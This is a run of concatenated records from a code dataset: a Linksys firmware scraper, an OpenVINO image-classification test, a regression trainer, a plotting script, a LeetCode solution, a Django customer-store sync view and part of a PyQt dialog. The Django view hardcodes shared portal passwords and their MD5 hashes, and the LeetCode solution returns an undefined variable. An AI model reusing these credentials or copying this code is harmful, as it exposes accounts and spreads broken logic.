LinksysGPL.extract_firmwares(response)\n for device, version, link in self.firmware_filter(firmware_extractor):\n yield from LinksysGPL.collect_firmware(device, version, link)\n\n def firmware_filter(self, extractor: Generator[Tuple[str, str, str], None, None]) -> Generator[Tuple[str, str, str], None, None]:\n if not self.whitelist_enabled:\n yield from extractor\n return\n\n for device, version, link in extractor:\n if any(allowed in device for allowed in self.whitelist):\n yield device, version, link\n\n @staticmethod\n def collect_firmware(device_name: str, version: str, link: str) -> Generator[FirmwareItem, None, None]:\n meta_data = LinksysGPL.prepare_meta_data(device_name, version, link)\n yield from LinksysGPL.prepare_item_pipeline(meta_data)\n\n @staticmethod\n def extract_firmwares(response: Response) -> Generator[Tuple[str, str, str], None, None]:\n device_names = []\n table = response.xpath(LinksysGPL.XPATH['table_rows'])[1:]\n for row in table:\n columns = row.xpath(LinksysGPL.XPATH['row_columns'])\n if len(columns) not in [2, 3]:\n continue\n\n offset = 0\n if len(columns) == 3:\n device_names = columns[0].xpath('.//text()').extract()\n offset = 1\n\n version = ''.join(columns[offset].xpath('.//text()').extract()).strip()\n link = ''.join(columns[offset + 1].xpath('.//a/@href').extract()).strip()\n for device in device_names:\n yield device.strip(), version, link\n\n @staticmethod\n def prepare_item_pipeline(meta_data: dict) -> Generator[FirmwareItem, None, None]:\n loader = ItemLoader(item=FirmwareItem(), selector=meta_data['file_urls'])\n loader.add_value('file_urls', meta_data['file_urls'])\n loader.add_value('vendor', meta_data['vendor'])\n loader.add_value('device_name', meta_data['device_name'])\n loader.add_value('device_class', meta_data['device_class'])\n loader.add_value('firmware_version', meta_data['firmware_version'])\n loader.add_value('release_date', meta_data['release_date'])\n yield loader.load_item()\n\n @staticmethod\n def prepare_meta_data(device_name: str, firmware_version: str, file_url: str) -> dict:\n return {\n 'file_urls': [file_url],\n 'vendor': 'Linksys',\n 'device_name': device_name,\n 'firmware_version': firmware_version,\n 'device_class': '-', # no information available\n 'release_date': '01-01-1970', # no information available\n }\n","repo_name":"mellowCS/FirmwareScraper","sub_path":"firmware/spiders/linksys_gpl.py","file_name":"linksys_gpl.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"30953102316","text":"#!/usr/bin/env python\nimport sys\nimport os\nimport time\nimport logging as log\nfrom argparse import ArgumentParser, SUPPRESS, RawTextHelpFormatter\nimport cv2\nimport numpy as np\n\n# 環境変数設定スクリプトが実行されているか確認\nif not \"INTEL_OPENVINO_DIR\" in os.environ:\n print(\"/opt/intel/openvino/bin/setupvars.sh が 実行されていないようです\")\n sys.exit(1)\nelse:\n # 環境変数を取得するには os.environ['INTEL_OPENVINO_DIR']\n # これを設定されてない変数に対して行うと例外を吐くので注意\n pass\n\n# openvino.inference_engine のバージョン取得\nfrom openvino.inference_engine import get_version as ov_get_version\nov_vession_str = ov_get_version()\n# print(ov_vession_str) # バージョン2019には '2.1.custom_releases/2019/R~'という文字列が入っている\n # バージョン2020には '~-releases/2020/~'という文字列が入っている\n # バージョン2021には '~-releases/2021/~'という文字列が入っている\n\n# バージョン判定\nif \"/2019/R\" in ov_vession_str :\n ov_vession = 2019 # 2019.*\nelif \"releases/2020/\" in ov_vession_str :\n ov_vession = 2020 # 2020.*\nelse :\n ov_vession = 2021 # デフォルト2021\n\nfrom openvino.inference_engine import IENetwork, IECore\n\nif ov_vession >= 2021 : \n # バージョン2021以降はngraphを使用\n import ngraph\n\n# ラベルマップ\nlabel_map = [\n \"飛行機\",\n \"自動車\",\n \"鳥\",\n \"猫\",\n \"鹿\",\n \"犬\",\n \"カエル\",\n \"馬\",\n \"船\",\n \"トラック\"\n]\n\n\n# コマンドラインパーサの構築 =====================================================\ndef build_argparser():\n parser = ArgumentParser(add_help=False, formatter_class=RawTextHelpFormatter)\n parser.add_argument('-h', '--help', action='help', default=SUPPRESS, \n help='Show this help message and exit.')\n parser.add_argument(\"-d\", \"--device\", default=\"CPU\", type=str, \n help=\"Optional\\n\"\n \"Specify the target device to infer on; \\n\"\n \"CPU, GPU, FPGA, HDDL or MYRIAD is acceptable.\\n\"\n \"The demo will look for a suitable plugin \\n\"\n \"for device specified.\\n\"\n \"Default value is CPU\")\n parser.add_argument(\"-l\", \"--cpu_extension\", type=str, default=None, \n help=\"Optional.\\n\"\n \"Required for CPU custom layers. \\n\"\n \"Absolute path to a shared library\\n\"\n \"with the kernels implementations.\\n\"\n \"以前はlibcpu_extension_avx2.so 指定が必須だったけど、\\n\"\n \"2020.1から不要になった\")\n return parser\n# ================================================================================\n# 結果の解析と表示\ndef decode_result(net, res, num_result=5) :\n out_blob = list(net.outputs.keys())[0]\n \n # for obj in res[out_blob][0][0]: # 例:このループは200回まわる\n if hasattr(res[out_blob], 'buffer') :\n # # 2021以降のバージョン\n res_shape = res[out_blob].buffer.shape\n # (1,10)のはず\n res_array = res[out_blob].buffer[0]\n else :\n res_shape = res[out_blob].shape\n res_array = res[out_blob][0]\n # 結果を降順に並べ替え\n sorted_res = np.argsort(res_array)[-num_result:][::-1]\n results = [(i, res_array[i]) for i in sorted_res]\n\n return results\n# ================================================================================\n\ndef main():\n log.basicConfig(format=\"[ %(levelname)s ] %(message)s\", level=log.INFO, stream=sys.stdout)\n \n # コマンドラインオプションの解析\n args = build_argparser().parse_args()\n \n model_xml = \"./_IR/cifar10/FP16/cifar10.xml\" # モデルファイル名(xml)(決め打ちで)\n model_bin = os.path.splitext(model_xml)[0] + \".bin\" # モデルファイル名(bin)\n \n # 指定されたデバイスの plugin の初期化\n log.info(\"Creating Inference Engine...\")\n ie = IECore()\n # 拡張ライブラリのロード(CPU使用時のみ)\n if args.cpu_extension and 'CPU' in args.device:\n log.info(\"Loading Extension Library...\")\n ie.add_extension(args.cpu_extension, \"CPU\")\n \n # IR(Intermediate Representation ;中間表現)ファイル(.xml & .bin) の読み込み\n log.info(f\"Loading model files:\\n\\t{model_xml}\\n\\t{model_bin}\\n\")\n # 2020.2以降、IENetwork()は非推奨となったため、ie.read_network()に差し替え\n if hasattr(ie, 'read_network') : # 2020.2以降のバージョン(IECore.read_networkメソッドがあるかで判定)\n net = ie.read_network(model=model_xml, weights=model_bin)\n else :\n net = IENetwork(model=model_xml, weights=model_bin)\n \n # 未サポートレイヤの確認\n if \"CPU\" in args.device:\n # サポートしているレイヤの一覧\n supported_layers = ie.query_network(net, \"CPU\")\n ### # netで使用されているレイヤでサポートしているレイヤの一覧にないもの\n ### not_supported_layers = [l for l in net.layers.keys() if l not in supported_layers]\n # netで使用されているレイヤ一覧\n if \"ngraph\" in sys.modules : # ngraphがインポート済みかで判定\n # バージョン 2021.x以降\n used_layers = [l.friendly_name for l in ngraph.function_from_cnn(net).get_ordered_ops()]\n else :\n # バージョン 2020.x以前\n used_layers = list(net.layers.keys())\n # netで使用されているレイヤでサポートしているレイヤの一覧にないもの\n not_supported_layers = [l for l in used_layers if l not in supported_layers]\n # サポートされていないレイヤがある?\n if len(not_supported_layers) != 0:\n # エラー終了\n log.error(f\"Following layers are not supported by the plugin for specified device {args.device}:\\n {', '.join(not_supported_layers)}\")\n log.error(\"Please try to specify cpu extensions library path in sample's command line parameters using -l \"\n \"or --cpu_extension command line argument\")\n sys.exit(1)\n \n # 入力層の情報出力\n log.info(\"Preparing inputs\")\n img_info_input_blob = None\n if hasattr(net, 'input_info') : # 2021以降のバージョン\n inputs = net.input_info\n else :\n inputs = net.inputs\n\n for blob_name in inputs:\n if hasattr(inputs[blob_name], 'shape') : # 2020以前のバージョン\n input_shape = inputs[blob_name].shape\n else : # 2021以降のバージョン\n input_shape = inputs[blob_name].input_data.shape\n print(f'==== {blob_name} {input_shape}')\n if len(input_shape) == 4:\n # 入力層でshapeが4のものを取り出す\n input_blob = blob_name\n else:\n # なければエラー\n raise RuntimeError(f\"Unsupported {len(input_shape)} input layer '{ blob_name}'. Only 4D input layers are supported\")\n \n # 入力画像情報の取得\n if hasattr(inputs[input_blob], 'input_data') :\n input_n, input_colors, input_height, input_width = inputs[input_blob].input_data.shape\n else :\n input_n, input_colors, input_height, input_width = inputs[input_blob].shape\n \n # データ入力用辞書\n feed_dict = {}\n \n # 静止画なので同期モードしか使用しない\n cur_request_id = 0 # 同期モードではID=0のみ使用\n next_request_id = 0 # 〃\n wait_key_code = 0 # 永久待ち\n \n # プラグインへモデルをロード\n log.info(\"Loading model to the plugin...\")\n exec_net = ie.load_network(network=net, num_requests=2, device_name=args.device)\n \n # 推論開始\n log.info(\"Starting inference...\")\n \n print(\"==== SINGLE MODE ====\")\n for file_number in range(100) :\n # 画像の前処理 =============================================================================\n # 入力画像の読み込み\n file_name = f'../img/{file_number}.png'\n # print(f'FILE: {file_name}')\n img = cv2.imread(file_name)\n \n # 入力用フレームの作成\n in_frame = cv2.resize(img, (input_width, input_height)) # リサイズ\n in_frame = in_frame.transpose((2, 0, 1)) # HWC → CHW\n in_frame = in_frame.reshape(input_shape) # CHW → BCHW\n feed_dict[input_blob] = in_frame\n \n inf_start = time.time() # 推論処理開始時刻 --------------------------------\n # 推論予約 =============================================================================\n exec_net.start_async(request_id=next_request_id, inputs=feed_dict)\n \n # 推論結果待ち =============================================================================\n while exec_net.requests[cur_request_id].wait(-1) != 0:\n continue\n \n inf_end = time.time() # 推論処理終了時刻 --------------------------------\n inf_time = inf_end - inf_start # 推論処理時間\n \n # 検出結果の解析 =============================================================================\n if hasattr(exec_net.requests[cur_request_id], 'output_blobs') : # 2021以降のバージョン\n res = exec_net.requests[cur_request_id].output_blobs\n else :\n res = exec_net.requests[cur_request_id].outputs\n # print(res)\n \n # 結果のデコード\n results = decode_result(net, res, 5)\n # 結果の表示 =============================================================================\n print(f'\\n{file_number}\\t', end='')\n for k, result in enumerate(results) :\n print(f'{label_map[result[0]]:_<5}, {result[1]:.5f} ',end='')\n print(f' time: {inf_time}',end='')\n \n # 後片付け\n print('')\n\nif __name__ == '__main__':\n sys.exit(main() or 0)\n","repo_name":"ippei8jp/keras_TransferLearning1","sub_path":"convert_to_openVINO/_test.py","file_name":"_test.py","file_ext":"py","file_size_in_byte":10586,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25289842437","text":"import os\nimport sys\nimport joblib as jb\nimport pandas as pd\nfrom sklearn.metrics import r2_score\nfrom sklearn.gaussian_process.kernels import RBF\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error as mse\nfrom sklearn.metrics import mean_absolute_error as mae\nfrom sklearn.gaussian_process import GaussianProcessRegressor as Gpr\nsys.path.append(os.path.abspath('../visualization'))\nimport visualize\n\ndata_type = ['robust', 'standard', 'minmax']\ndata_type_index = 2\ntest_size = 0.25\nrandom_state = 48\npath = f'../../dataset/scaled/netflix_scaled_{data_type[data_type_index]}.csv'\n\n\nclass TrainModel:\n def __init__(self):\n self.df_netflix = pd.read_csv(path, index_col=False)\n self.visualize = visualize.Visualize()\n\n @staticmethod\n def display_dataframe(name, df, contents):\n table = df.head(contents)\n print('\\n')\n print(\"=\" * 150)\n print(\"◘ \", name, \" Dataframe:\")\n print(table.to_string())\n print(\"=\" * 150)\n\n @staticmethod\n def debug_text(title, task):\n print('\\n')\n print(\"=\" * 150)\n print('◘ ', title)\n\n try:\n print(task)\n\n except Exception as exc:\n print(\"! \", exc)\n\n finally:\n print(\"=\" * 150)\n\n def train_model(self):\n df_columns = self.df_netflix.columns.values.tolist()\n self.debug_text(\"Dataframe Columns\", df_columns)\n\n df_x = self.df_netflix.copy()\n df_x = df_x.drop(columns=['clv'])\n\n df_y = self.df_netflix[['clv']]\n self.display_dataframe(\"Features\", df_x, 10)\n self.display_dataframe(\"Label\", df_y, 10)\n\n train_x, test_x, train_y, test_y = train_test_split(df_x, df_y, test_size=test_size, random_state=random_state)\n self.debug_text(\"Shape of Training set:\", train_x.shape)\n self.debug_text(\"Shape of Testing set:\", test_x.shape)\n\n # Grid CV Search\n kernels = [1 * RBF(1), 2 * RBF(1), 1 * RBF(2), 2 * RBF(2)]\n gpr_params = {'kernel': kernels}\n\n gpr = Gpr(optimizer='fmin_l_bfgs_b', random_state=48)\n gpr_grid = GridSearchCV(gpr, gpr_params, scoring='neg_mean_squared_error', cv=5)\n grid_search = gpr_grid\n grid_search.fit(train_x, train_y)\n\n self.debug_text(\"Ideal parameters: \", grid_search.best_params_)\n self.debug_text(\"Ideal Score: \", grid_search.best_score_)\n ideal_param = grid_search.best_params_['kernel']\n\n k = 1\n rbf = 1\n for kernel in kernels:\n if kernel == ideal_param:\n self.debug_text(f\"Ideal Raw parameters:\\nk={k}, rbf={rbf}\", kernel)\n\n k += 1\n if k > 2:\n k = 1\n rbf += 1\n\n if rbf > 2:\n break\n\n # GPR Model with ideal hyperparameters\n gpr = Gpr(kernel=ideal_param, optimizer='fmin_l_bfgs_b', random_state=48)\n gpr.fit(train_x, train_y)\n pred_y = gpr.predict(train_x)\n\n # Loss Functions\n loss_mse = mse(train_y, pred_y, squared=False)\n loss_r_mse = mse(train_y, pred_y, squared=True)\n loss_r2 = r2_score(train_y, pred_y)\n loss_mae = mae(train_y, pred_y)\n\n self.debug_text(f\"MSE (Training {data_type[data_type_index]} data):\", loss_mse)\n self.debug_text(f\"RMSE (Training {data_type[data_type_index]} data):\", loss_r_mse)\n self.debug_text(f\"R-Squared (Training {data_type[data_type_index]} data):\", loss_r2)\n self.debug_text(f\"MAE (Training {data_type[data_type_index]} data):\", loss_mae)\n\n title = f\"Residual Loss (Training {data_type[data_type_index]} data)\"\n self.visualize.plot_residual(train_y, pred_y, title, \"Actual Values\", \"Predicted Values\")\n\n bins = 10\n x_label = 'Errors'\n y_label = 'Frequency'\n error_list = pred_y - train_y.to_numpy().ravel()\n title = f\"Prediction error distribution (Training {data_type[data_type_index]} data)\"\n self.visualize.plot_dist(error_list, bins, title, x_label, y_label)\n\n # Store Model\n try:\n jb.dump(gpr, f'../../models/gpr_{data_type[data_type_index]}.pkl')\n\n except Exception as exc:\n self.debug_text(\"! Exception encountered\", exc)\n\n else:\n self.debug_text(\"• Model saved successfully\", '')\n\n def data_storage(self, df, name):\n # Save partitioned data to storage\n try:\n df.to_csv(f'../../dataset/test_set/netflix_{str(name)}.csv', sep=',', index=False)\n\n except Exception as exc:\n self.debug_text(\"! Exception encountered\", exc)\n\n else:\n text = \"Dataframe successfully saved\"\n self.debug_text(text, '...')\n\n\nif __name__ == \"__main__\":\n main = TrainModel()\n main.train_model()\n","repo_name":"shahriar-rahman/Netflix-Customer-Retention-using-GPR","sub_path":"src/models/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"5"} +{"seq_id":"8735638927","text":"from pylab import *\n\nX = np.linspace(-np.pi, np.pi, 256,endpoint=True)\nS = np.sin(X)\n\nplot(X,S, color='crimson', linewidth=2.0)\nplot([-4,4],[0,0], color='black')\nplot([np.pi/2,np.pi/2],[0,1], '--', color='black')\nplot([np.pi/2-.5,np.pi/2+.5],[1,1], '--', color='black')\n\nylim(-1.5,1.5)\ntext(-np.pi-.1,0.05,'$a$')\ntext(np.pi,-0.1,'$b$')\ntext(np.pi/2-.1,-0.1,'$c$')\ntext(np.pi/2+0.6,1, '$f\\'(c)=0$')\n\ngca().xaxis.set_major_locator(NullLocator()) \ngca().yaxis.set_major_locator(NullLocator()) \nshow()\n","repo_name":"juergenmeinecke/EMET1001","sub_path":"pyplots/source_files/rollestheorem.py","file_name":"rollestheorem.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"34546519794","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def minCameraCover(self, root: Optional[TreeNode]) -> int:\n \n # has no obligation for it's parent, it's parent is covered by something else\n dp1, dp2, dp3 = {}, {}, {}\n def f1(root):\n \n if root in dp1:\n return dp1[root]\n \n if not root:\n return 0\n \n if not root.left and not root.right:\n return 1\n \n withCamera = 1 + f2(root.left) + f2(root.right)\n \n left, right = float('inf'), float('inf')\n \n left = f3(root.left) + f1(root.right)\n right = f1(root.left) + f3(root.right)\n \n withoutCamera = min(left, right)\n dp1[root] = min(withCamera, withoutCamera)\n return dp[root]\n \n # there is no compulsion at all to put a camera here\n def f2(root):\n \n if root in dp2:\n return dp2[root]\n \n withCamera = 1 + f2(root.left) + f2(root.right)\n withoutCamera = f1(root.left) + f1(root.right)\n \n dp2[root] = min(withCamera, withoutCamera)\n return dp2[root]\n \n # compulsory to put a camera here\n def f3(root):\n \n if root in dp3:\n return dp3[root]\n \n dp3[root] = 1 + f2(root.left) + f2(root.right)\n return dp3[root]\n \n return f1(root)\n \n ","repo_name":"therealharish/Problem-Solving","sub_path":"leetcode/968. Binary Tree Cameras.py","file_name":"968. Binary Tree Cameras.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41638497755","text":"from django.shortcuts import render,redirect\nimport json\nfrom django.core.paginator import Paginator\nfrom datetime import date, timedelta\nfrom ..models import Customer, CustomerReport\nfrom django.http import HttpResponse\nfrom django.db.models import Q\nfrom django.views.decorators.csrf import csrf_exempt\n\ndef index(request,pIndex=1):\n\n # 客户列表\n ob = Customer.objects\n oblist = ob.all()\n\n # 客户门店数据\n cs_store = CustomerReport.objects\n\n # 筛选条件\n where = []\n key = request.GET.get(\"keyword\", None)\n if key:\n oblist = oblist.filter(Q(cs_name__contains=key)|Q(cs_am__contains=key))\n where.append('keyword=' + key)\n\n # 汇总数据\n cs_store_list = []\n\n # 判断本月数据bydq_count\n current_year, current_month = date.today().year, date.today().month\n\n # 判断下月数据\n next_month = date.today().replace(day=28) + timedelta(days=4)\n next_month = next_month.replace(day=1)\n next_year, next_month = next_month.year, next_month.month\n title = ['客户ID','客户名称','客户负责人','有效门店数','配送中心数','直营门店数','加盟门店数','外销门店数','本月到期数','下月到期数','操作']\n\n for i in oblist:\n cs_count = cs_store.filter(cs_id=i.id).count()\n ps_count = cs_store.filter(cs_id=i.id, store_type='3').count()\n zy_count = cs_store.filter(cs_id=i.id, store_type='4').count()\n jm_count = cs_store.filter(cs_id=i.id, store_type='5').count()\n wx_count = cs_store.filter(cs_id=i.id, store_type='6').count()\n bydq_count = cs_store.filter(cs_id=i.id, store_ex_time__year=current_year, store_ex_time__month=current_month).count()\n xydq_count = cs_store.filter(cs_id=i.id, store_ex_time__year=next_year, store_ex_time__month=next_month).count()\n\n data = {\n 'id': i.id,\n 'cs_name': i.cs_name,\n 'cs_am': i.cs_am,\n 'cs_count': cs_count,\n 'ps_count': ps_count,\n 'zy_count': zy_count,\n 'jm_count': jm_count,\n 'wx_count': wx_count,\n 'bydq_count': bydq_count,\n 'xydq_count': xydq_count\n }\n cs_store_list.append(data)\n\n pIndex = int(pIndex)\n page = Paginator(cs_store_list, 100)\n maxpages = page.num_pages\n if pIndex > maxpages:\n pIndex = maxpages\n if pIndex < 1:\n pIndex = 1\n cs_store_list = page.page(pIndex) # 获取当前页数据\n plist = page.page_range # 获取页码列表信息\n\n\n\n context = {\"title\": title, \"CustomerReport_list\": cs_store_list, 'plist': plist, 'pIndex': pIndex, 'maxpages': maxpages,}\n return render(request,\"Customer_checks/index.html\",context)\n\n\ndef StoreDataUpdate(request,cs_id=0):\n # 如果=0为获取全部客户门店数据,非0获取单个客户门店数据\n if cs_id != 0:\n try:\n # 获取数据库中客户的url和账号密码\n csdb = Customer.objects.get(id=cs_id)\n url = csdb.cs_url\n username = csdb.cs_username\n pwd = csdb.cs_password\n cs_am = csdb.cs_am\n\n except Exception as err:\n\n print(err)\n\n # 更新先清空门店客户信息\n rdb = CustomerReport.objects.filter(cs_id=cs_id)\n rdb.delete()\n\n # 获取门店数据\n r = GetStoreData(url, username, pwd)\n for vo in r['data']:\n rdb = CustomerReport()\n rdb.cs_id = cs_id\n rdb.cs_am = cs_am\n rdb.store_id = vo['sid']\n rdb.store_name = vo['shopname']\n rdb.store_type = vo['stype'] # 3=配送中心,4=直营店,5=加盟店,6=外销客户\n rdb.store_ex_time = vo['renewaltime'] # 到期时间\n if vo['renewaltime'] == '0000-00-00':\n rdb.store_ex_time = '2099-12-1'\n elif vo['renewaltime'] == None:\n rdb.store_ex_time = '2099-12-1'\n\n rdb.save()\n\n data = [{\n 'success': True,\n 'msg': '操作成功!'\n }]\n\n return HttpResponse(data)\n else:\n try:\n # 获取所有客户信息\n csdb = Customer.objects.all()\n for i in csdb:\n url = i.cs_url\n username = i.cs_username\n pwd = i.cs_password\n cs_am = i.cs_am\n # 更新先清空门店客户信息\n rdb = CustomerReport.objects.filter(cs_id=i.id)\n rdb.delete()\n # 获取门店数据\n r = GetStoreData(url,username,pwd)\n for vo in r['data']:\n rdb = CustomerReport()\n rdb.cs_id = i.id\n rdb.cs_am = cs_am\n rdb.store_id = vo['sid']\n rdb.store_name = vo['shopname']\n rdb.store_type = vo['stype'] # 3=配送中心,4=直营店,5=加盟店,6=外销客户\n rdb.store_ex_time = vo['renewaltime'] # 到期时间\n if vo['renewaltime'] == '0000-00-00':\n rdb.store_ex_time = '2099-12-1'\n elif vo['renewaltime'] == None:\n rdb.store_ex_time = '2099-12-1'\n\n rdb.save()\n data = [{\n 'success': True,\n 'msg': '操作成功!'\n }]\n return HttpResponse(data)\n except Exception as err:\n data = [{\n 'success': False,\n 'msg': '操作失败!'\n }]\n return HttpResponse(data)\n\n# 获取门店信息接口\ndef GetStoreData(url, username, pwd):\n\n import requests\n import hashlib\n\n # 设置请求头\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'\n }\n # 登录网页\n url_login = url + \"?do=check\"\n\n #print(url_login)\n\n # 密码需要MD5加密\n md5 = hashlib.md5()\n md5.update(pwd.encode('utf-8'))\n hide_pw = md5.hexdigest()\n\n # 有一些固定密码\n if pwd == \"acewill@321\":\n hide_pw = 'fe9bd43565f5d435da0539793d93c0e9'\n if pwd == \"gyljcgtdcpb@acewill.cn\":\n hide_pw = \"2142baf3b6e652c61ac34a9e29d19999\"\n\n # 组装请求参数:用户名,密码,加密后的密码\n data = {\n 'name': username,\n 'pwd': pwd,\n 'hide_pw': hide_pw\n }\n\n # 请求网址,并获取cookie 登录后的cookie\n response = requests.post(url_login, headers=headers, data=data)\n cookie = response.cookies\n print(\"这是登录后的cookie:\", cookie.get)\n #print(\"登录后的返回::\",response.text)\n\n # 继续请求,进入一个门店\n url_get_store = url + \"logistics/?do=selectstore\"\n data = {\n 'lsid': \"2\",\n }\n response = requests.post(url_get_store, cookies=cookie, headers=headers, data=data)\n print(\"这是进入门店后的cookie:\", response.cookies.get)\n #print(\"进入门店后返回:\", response.text)\n\n # 进入门店查询功能,老版本需要\n url_get_tablename = url + \"chainsales/head/shop?tablename=sys_user_func\"\n requests.get(url_get_tablename, cookies=cookie, headers=headers, data=data)\n print(\"这是进入门店后的cookie:\", cookie.get)\n #print(\"进入门店查询后的返回:\", response.text)\n\n # 获取门店数据\n url_get_storelist = url + \"chainsales/head/shop/listshop?limit=1000\"\n response = requests.get(url_get_storelist, cookies=cookie, headers=headers, data=data)\n #print(\"这是获取到的门店列表:\", response.json())\n\n return response.json()\n","repo_name":"xxnhao/scmcrm","sub_path":"scmcrm/tool/views/Customer_checks.py","file_name":"Customer_checks.py","file_ext":"py","file_size_in_byte":7711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35120592695","text":"\"\"\"\nСоздать функцию, которая принимает на вход неопределенное количество аргументов\nи возвращает их сумму и максимальное из них.\n\"\"\"\n\n\ndef summMax(*numbers):\n summ = 0\n for number in numbers:\n summ += number\n return summ, max(numbers)\n\n\nsumm, maxNumber = summMax(4, 3, 2, 1)\n\n\ndef main():\n print(summ, maxNumber)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cabronas/TMS87_Maksim","sub_path":"OOP/Feb 20 - Mar - 20/func/func_06.py","file_name":"func_06.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"237695085","text":"\"\"\"\n@author Lucas\n@date 2018/12/11 21:47\nTCP链接\n\"\"\"\nimport socket\n\n# 创建一个socket\n# 参数1:指定协议AF_INET 或者 AF_INET6\n# 参数2:SOCK_STREAM执行使用面向流的TCP协议\nsk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# 建立连接\n# 参数是一个元组\nsk.connect((\"www.baidu.com\", 80))\n\nsk.send(b\"GET / HTTP/1.1\\r\\nHost: www.baidu.com\\r\\nConnection: close\\r\\n\\r\\n\")\n\n# 等待接收数据\ndata = []\nwhile True:\n # 每次接受1K数据\n tempData = sk.recv(1024)\n if tempData:\n data.append(tempData)\n else:\n break\n\ndataStr = (b\"\".join(data)).decode(\"utf-8\")\n\n# 断开连接\nsk.close()\n# print(dataStr)\n\nheaders, HTML = dataStr.split('\\r\\n\\r\\n', 1)\n# print(headers)\nprint(HTML)","repo_name":"Conjugasion/python_study","sub_path":"main/TCP/客户端.py","file_name":"客户端.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13469745717","text":"from PyQt4.QtGui import QDialog, QGroupBox, QFormLayout, QLineEdit, QLabel, QRadioButton, \\\n QGridLayout, QVBoxLayout, QPushButton\nfrom chem.Reaction import Reaction\n\nclass ConditionsDialog(QDialog):\n def __init__(self, reaction):\n super(ConditionsDialog, self).__init__()\n self.setGeometry (300 , 300 , 700 , 350)\n self.setWindowTitle ('Edit Conditions')\n if reaction is None:\n self._reaction = Reaction()\n else:\n self._reaction = reaction\n self._CanReturnReaction = False\n\n # Sets up GUI widgets. Formula boxes will need to support super and subscript somehow\n # Will also need validation later\n\n # Reactants section\n self._reactantbox = QGroupBox(\"Reactants\", self)\n self._reactantform = QFormLayout()\n self._reactantinfoboxes = []\n self._productinfoboxes = []\n self._catalystinfoboxes = []\n for x in range(Reaction.REACTING_SPECIES_LIMIT):\n self._reactantinfoboxes.append(QLineEdit())\n self._reactantinfoboxes[x*2].setText(self._reaction.GetReactants()[x].GetFormula())\n self._reactantinfoboxes.append(QLineEdit())\n self._reactantinfoboxes[x*2+1].setText(str(self._reaction.GetReactants()[x].GetInitialMoles()))\n self._reactantform.addRow(QLabel(str(x + 1)+\".\\tFormula:\"), self._reactantinfoboxes[x*2])\n self._reactantform.addRow(QLabel(\"\\tInitial Moles:\"), self._reactantinfoboxes[x*2+1])\n self._reactantbox.setLayout(self._reactantform)\n # Products section\n self._productbox = QGroupBox(\"Products\", self)\n self._productform = QFormLayout()\n for x in range(Reaction.REACTING_SPECIES_LIMIT):\n self._productinfoboxes.append(QLineEdit())\n self._productinfoboxes[x*2].setText(self._reaction.GetProducts()[x].GetFormula())\n self._productinfoboxes.append(QLineEdit())\n self._productinfoboxes[x*2+1].setText(str(self._reaction.GetProducts()[x].GetInitialMoles()))\n self._productform.addRow(QLabel(str(x + 1)+\".\\tFormula:\"), self._productinfoboxes[x*2])\n self._productform.addRow(QLabel(\"\\tInitial Moles:\"), self._productinfoboxes[x*2+1])\n self._productbox.setLayout(self._productform)\n # Catalyst section\n self._catalystbox = QGroupBox(\"Catalyst\", self)\n self._catalystform = QFormLayout()\n self._catalystinfoboxes.append(QLineEdit())\n self._catalystinfoboxes.append(QLineEdit())\n self._catalystinfoboxes.append(QLineEdit())\n self._catalystinfoboxes[0].setText(self._reaction.GetCatalyst().GetFormula())\n self._catalystinfoboxes[1].setText(str(self._reaction.GetCatalyst().GetInitialMoles()))\n self._catalystinfoboxes[2].setText(str(self._reaction.GetCatalyst().GetEaChangePerMole()))\n self._catalystform.addRow(QLabel(\"Formula:\"), self._catalystinfoboxes[0])\n self._catalystform.addRow(QLabel(\"Moles:\"), self._catalystinfoboxes[1])\n self._catalystform.addRow(QLabel(\"Ea change (per mole):\"), self._catalystinfoboxes[2])\n self._catalystbox.setLayout(self._catalystform)\n # Forward heat transfer\n self._heatbox = QGroupBox(\"Forward heat transfer\", self)\n self._heatform = QFormLayout()\n self._endo = QRadioButton(\"Endothermic\")\n self._exo = QRadioButton(\"Exothermic\")\n if self._reaction.GetEndothermic():\n self._endo.setChecked(True)\n else:\n self._exo.setChecked(True)\n self._heatform.addRow(self._endo)\n self._heatform.addRow(self._exo)\n self._heatbox.setLayout(self._heatform)\n # Other conditions section. Includes Vessel volume; Temperature.\n self._otherbox = QGroupBox(\"Other conditions\")\n self._otherform = QFormLayout()\n self._tempbox = QLineEdit()\n self._volbox = QLineEdit()\n self._tempbox.setText(str(self._reaction.GetTemperature()))\n self._volbox.setText(str(self._reaction.GetVolume()))\n self._otherform.addRow(QLabel(\"Vessel volume:\"), self._volbox)\n self._otherform.addRow(QLabel(\"Temperature:\"), self._tempbox)\n self._otherbox.setLayout(self._otherform)\n # OK and Cancel buttons\n self._okbtn = QPushButton(\"OK\")\n self._okbtn.clicked.connect(self.ApplyChanges)\n self._cancelbtn = QPushButton(\"Cancel\")\n\n self._rightbox = QGroupBox()\n self._rightbox.setFlat(False)\n self._rightform = QVBoxLayout()\n self._rightform.addWidget(self._catalystbox)\n self._rightform.addWidget(self._heatbox)\n self._rightform.addWidget(self._otherbox)\n self._rightbox.setLayout(self._rightform)\n\n # Layout of all 